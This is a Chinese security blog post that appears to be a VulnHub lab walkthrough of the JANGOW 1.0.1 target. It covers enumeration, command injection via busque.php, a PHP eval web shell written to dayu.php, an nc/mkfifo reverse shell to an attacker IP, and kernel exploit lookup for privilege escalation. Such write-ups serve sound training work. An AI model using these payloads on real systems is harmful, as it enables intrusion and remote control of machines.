freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

大余每日一攻防JANGOW-1.0.1(三)
2023-12-02 17:26:57

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:
环境攻破: 以简单直白的方式攻破每日选择的渗透测试环境。
代码审计: 进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一、网络枚举

1701421676_6569a26c09b7d5852d983.png!small?1701421676378

1701421681_6569a2711d72131c5a56e.png!small?1701421683947
发现IP地址为:192.168.3.186,开启21和80端口。

二、web信息探测+命令执行

feroxbuster 是一种用于目录和子域名爆破的工具。它设计用于在Web应用程序渗透测试中,通过对目标进行逐一遍历,发现隐藏的目录或文件,以及可能的子域名,配合配合/usr/share/seclists字典很高效率。

https://www.ddosi.org/feroxbuster/
https://github.com/epi052/feroxbuster

1701421686_6569a276b1d1aa4382d4b.png!small?1701421688900

1701421692_6569a27c1c604c4dc29a5.png!small?1701421694310
发现存在:http://192.168.3.185/site/busque.php

通过site接口源代码发现:
1701421697_6569a281879e031160ec0.png!small?1701421699437

http://192.168.3.185/site/busque.php?buscar=id

1701421702_6569a28672aff7f89cbdc.png!small?1701421703971
测试存在命令执行!!

curl http://192.168.3.185/site/busque.php?buscar=cat+busque.php

1701421710_6569a28e83ca69956e341.png!small?1701421711654
查看源代码发现是作者留下的一句话,主要考察发现点而已。

三、反弹shell技巧

直接一句话上传,用蚁剑连接:

http://192.168.3.185/site/busque.php?buscar=echo '<?php @eval($_POST['shell']);?>' > dayu.php

1701421717_6569a29537c87b2600c10.png!small?1701421717830
1701421721_6569a299857e6b0634fea.png!small?1701421722348

发现了wordpress的账号密码:
1701421726_6569a29e7fc2d2b478989.png!small?1701421727762

发现.backup 文件中的jangow01/abygurl69:
1701421730_6569a2a2e34f118b1f3c2.png!small?1701421731576
ftp可以登录没什么信息!

反弹shell:

<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.56 443 >/tmp/f");?>

1701421736_6569a2a8295530f67d138.png!small?1701421737211
通过蚁剑写入代码执行成功反弹shell回来。

四、提权

先查看下系统版本:uname -a
1701421741_6569a2ad5c685200c35d8.png!small?1701421742196
乌班图版本:4.4.0

searchsploit ubuntu 4.4.0-31

1701421746_6569a2b28817a8f67d57d.png!small?1701421747699

1701421750_6569a2b6badf68b32630e.png!small?1701421751880

1701421756_6569a2bccacd716e03455.png!small?1701421759113

四、源代码

查看源代码基本没有什么审计分析的:
1701421761_6569a2c19e76826546255.png!small?17014217630291701421766_6569a2c66574a1d578f6f.png!small?1701421768979
两个源代码,一个是木马、一个是泄露ftp账号密码。

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!


欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

1701237386_6566d28ad323e31f56884.png!small?1701237387378

# 网络安全 # web安全 # 漏洞分析 # CTF # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录